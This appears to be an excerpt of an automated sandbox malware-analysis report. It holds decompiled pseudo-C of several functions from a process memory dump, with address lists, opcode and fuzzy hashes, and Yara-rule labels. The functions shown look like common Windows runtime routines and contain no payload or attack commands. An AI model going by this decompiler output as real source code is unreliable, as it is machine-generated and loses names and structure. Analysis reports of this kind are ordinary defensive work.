							_t141 = E00F4F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E00F2FFB0(_t193, _t235, 0x1008550);
								L5:
								return E00F6D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E00F11C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x1007b9c; // 0x0
							_t235 = L00F34620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x1007b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E00F4A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E00F2FFB0(_t193, _t235, 0x1008550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L00F377F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L00F377F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x1007b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x1007b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E00F537C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x1007b9c; // 0x0
									_t214 = L00F34620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E00F537F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x1007b10 =  *0x1007b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x1007b04 =  *0x1007b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L00F377F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L00F377F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x1007b08 =  *0x1007b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E00F557C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E00F5F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L00F377F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E00F4A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L00F377F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E00F596C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x00f2849b
0x00f2849b
0x00f2849b
0x00f2849b
0x00f2849d
0x00f284a2
0x00f284a7
0x00f284b1
0x00f284d8
0x00000000
0x00f284b3
0x00f284c4
0x00f284c9
0x00f284cd
0x00f284cf
0x00f284cf
0x00f284d6
0x00f284e6
0x00f284e9
0x00f284ec
0x00f284ef
0x00f284f2
0x00f284f4
0x00f284fc
0x00f28501
0x00f28506
0x00f28509
0x00f286e0
0x00f286e5
0x00f286e8
0x00f286ed
0x00f286f0
0x00f286f2
0x00f79afd
0x00f79b02
0x00f284da
0x00f284df
0x00f284df
0x00f286fa
0x00f286fd
0x00f286fe
0x00f28701
0x00f28706
0x00f28709
0x00f2870b
0x00000000
0x00000000
0x00f28711
0x00f28725
0x00f28727
0x00f2872a
0x00f2872c
0x00f79af0
0x00f79af5
0x00f28732
0x00f28732
0x00f28732
0x00f28735
0x00f28737
0x00f28515
0x00f28515
0x00f28518
0x00f2851d
0x00f28523
0x00f28527
0x00f2852b
0x00f28537
0x00f28539
0x00f2853c
0x00f2853e
0x00f2868c
0x00f28691
0x00f28699
0x00f2869b
0x00f28744
0x00f28748
0x00f286a1
0x00f286a1
0x00f286a1
0x00f286a4
0x00f286a8
0x00f79bdf
0x00f79bdf
0x00f286ae
0x00f286b0
0x00000000
0x00f286b6
0x00000000
0x00f79be9
0x00f286b0
0x00f28544
0x00f2854a
0x00f2854d
0x00f28551
0x00f2876e
0x00f28778
0x00f2877b
0x00f28780
0x00f28557
0x00f28557
0x00f2855d
0x00f2855d
0x00f2856b
0x00f2856e
0x00f28570
0x00f28573
0x00f28576
0x00f28576
0x00f28579
0x00f2857b
0x00000000
0x00000000
0x00f28581
0x00f285a0
0x00f285a2
0x00f285a5
0x00f285a7
0x00f79b1b
0x00f79b1b
0x00f2862e
0x00f2862e
0x00f28631
0x00f28631
0x00f28634
0x00f28636
0x00f28669
0x00f28669
0x00f2866b
0x00f79bbf
0x00f79bc4
0x00f79bc8
0x00f79bce
0x00f79bce
0x00f28671
0x00f28671
0x00f28674
0x00f28676
0x00f79bae
0x00f79bae
0x00f28676
0x00f2867c
0x00f2867e
0x00f28688
0x00f28688
0x00000000
0x00f2867e
0x00f28638
0x00f28638
0x00f2863b
0x00f2863e
0x00f2863f
0x00f28642
0x00f28645
0x00f28648
0x00f2864d
0x00f79b69
0x00f79b6e
0x00f79b7b
0x00f79b81
0x00f79b85
0x00f79b89
0x00f79ba7
0x00f79b8b
0x00f79b91
0x00f79b9a
0x00f79b9f
0x00f79b9f
0x00f28788
0x00f2878d
0x00f28763
0x00f28763
0x00f28766
0x00000000
0x00f28766
0x00f79b70
0x00000000
0x00f79b70
0x00f28656
0x00f2865a
0x00f2865c
0x00f28752
0x00f28756
0x00000000
0x00000000
0x00f2875e
0x00000000
0x00f2875e
0x00f28662
0x00f28662
0x00f28662
0x00f28666
0x00000000
0x00f28666
0x00f285b7
0x00f285b9
0x00f285bc
0x00f285bf
0x00f285cc
0x00f285d1
0x00f285d4
0x00f285db
0x00f285de
0x00f285e0
0x00f79b5f
0x00000000
0x00f79b5f
0x00f285e6
0x00f285ea
0x00f286c3
0x00f286c5
0x00f286c8
0x00f286ca
0x00f79b16
0x00000000
0x00f79b16
0x00f286d6
0x00f285f6
0x00f285f6
0x00f285f9
0x00f28602
0x00f28606
0x00f2860a
0x00f2860b
0x00f2860e
0x00f28611
0x00000000
0x00f28611
0x00f285f3
0x00000000
0x00f285f3
0x00f28619
0x00f2861e
0x00f2861e
0x00f28621
0x00f28622
0x00f28623
0x00f28625
0x00f2862c
0x00000000
0x00f2873d
0x00000000
0x00f2873d
0x00f28737
0x00f2850f
0x00f28512
0x00000000
0x00f28512
0x00000000
0x00f284d6

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11fb804ccd25e2024f5acc175202784e1a19f9504bc9ffd1742023cd9d8caa4a
Instruction ID: 632de059874185b27341087e7249e558dea8cc3e2fa582687d5ff88b9caa8dc1
Opcode Fuzzy Hash: 11fb804ccd25e2024f5acc175202784e1a19f9504bc9ffd1742023cd9d8caa4a
Instruction Fuzzy Hash: 5EB1BF70E05219DFDB24DFD8D880AADBBB5FF48310F20812AE505AB345DB74AD46EB40

Uniqueness

Uniqueness Score: -1.00%

Function 00F4513A, Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00F4513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x100d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E00F5D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E00F32280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L00F34620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E00F5F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E00F2FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x100b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E00F5B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x00f45142
0x00f4514c
0x00f45150
0x00f45157
0x00f45159
0x00f4515e
0x00f45165
0x00f45169
0x00f4516c
0x00f45172
0x00f45176
0x00f4517a
0x00f4517a
0x00f4517a
0x00f4517f
0x00f86d8b
0x00f86d8e
0x00f86d91
0x00f86d95
0x00f86d98
0x00f86d9c
0x00f86da0
0x00f86da3
0x00f86da7
0x00f86e26
0x00f86e26
0x00f86e2a
0x00f451f9
0x00f451f9
0x00f451fe
0x00f86e33
0x00f86e33
0x00f86e39
0x00f86e3d
0x00f86e46
0x00f86e50
0x00000000
0x00000000
0x00f86e52
0x00f86e53
0x00f86e56
0x00f86e5d
0x00000000
0x00000000
0x00000000
0x00f86e5f
0x00f86e67
0x00f86e77
0x00f86e7f
0x00f86e80
0x00f86e88
0x00f86e90
0x00f86e9f
0x00f86ea5
0x00f86ea9
0x00f86eb1
0x00f86ebf
0x00000000
0x00000000
0x00f86ecf
0x00f86ed3
0x00000000
0x00000000
0x00f86edb
0x00f86ede
0x00f86ee1
0x00f86ee8
0x00f86eeb
0x00f86eed
0x00f86ef0
0x00f86ef4
0x00f86ef8
0x00f86efc
0x00000000
0x00000000
0x00f86f0d
0x00f86f11
0x00f86f32
0x00f86f37
0x00f86f3b
0x00f86f3e
0x00f86f41
0x00f86f46
0x00000000
0x00000000
0x00f86f4c
0x00f86f50
0x00f86f50
0x00f86f54
0x00f86f62
0x00f86f65
0x00f86f6d
0x00f86f7b
0x00f86f7b
0x00f86f93
0x00f86f98
0x00f86fa0
0x00f86fa6
0x00f86fb3
0x00f86fb6
0x00f86fbf
0x00f86fc1
0x00f86fd5
0x00f86fda
0x00f86fda
0x00f86fdd
0x00f86fe2
0x00f86fe7
0x00f86feb
0x00f86fef
0x00f86ff3
0x00f4520c
0x00f4520c
0x00f4520f
0x00f45215
0x00f45234
0x00f4523a
0x00f4523a
0x00f45244
0x00f45245
0x00f45246
0x00f45251
0x00f45251
0x00f86f13
0x00f86f17
0x00f86f17
0x00f86f18
0x00f86f1b
0x00f86f1f
0x00f86f23
0x00000000
0x00f86f28
0x00f45204
0x00f45204
0x00f45208
0x00000000
0x00f45208
0x00f45185
0x00f45188
0x00f4518a
0x00f4518e
0x00f45195
0x00f86db1
0x00f86db5
0x00f86db9
0x00f4519b
0x00f4519b
0x00f4519e
0x00f451a7
0x00f451a9
0x00f451a9
0x00f451b5
0x00f451b8
0x00f451bb
0x00f451be
0x00f451c1
0x00f451c5
0x00f451c9
0x00f451cd
0x00f451cd
0x00f451d8
0x00f451dc
0x00f451e0
0x00f86dcc
0x00f86dd0
0x00f86dd5
0x00f86ddd
0x00f86de1
0x00f86de1
0x00f86de5
0x00f86deb
0x00f86df1
0x00f86df7
0x00f86dfd
0x00f86e01
0x00f86e05
0x00f86e09
0x00f86e0d
0x00f86e11
0x00f86e11
0x00f451eb
0x00f86e1a
0x00f86e1f
0x00f86e21
0x00f86e23
0x00000000
0x00f451f1
0x00f451f1
0x00000000
0x00f451f1

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c116c582a42be110a7790fbc4dda76b6d8863dc2751ab8ef822f13006755eef
Instruction ID: 327f02c4f4695fdfa3223511c10cfa76db2e6d6653cfe7d3aba9dc27021a29fa
Opcode Fuzzy Hash: 2c116c582a42be110a7790fbc4dda76b6d8863dc2751ab8ef822f13006755eef
Instruction Fuzzy Hash: F6C15275A083808FD354CF28C480A5AFBF1BF88714F148A6EF9998B352D774E945DB42

Uniqueness

Uniqueness Score: -1.00%

Function 00F1C600, Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00F1C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x100d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E00F26D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E00F5B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x1007b9c; // 0x0
					_t74 = L00F34620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E00F59650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L00F377F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E00F5F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E00F513C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L00F377F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E00F59650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x00f1c608
0x00f1c615
0x00f1c625
0x00f1c62d
0x00f1c635
0x00f1c640
0x00f1c680
0x00f1c687
0x00f1c688
0x00f1c689
0x00f1c694
0x00f1c694
0x00f1c642
0x00f1c64a
0x00f1c697
0x00f87a25
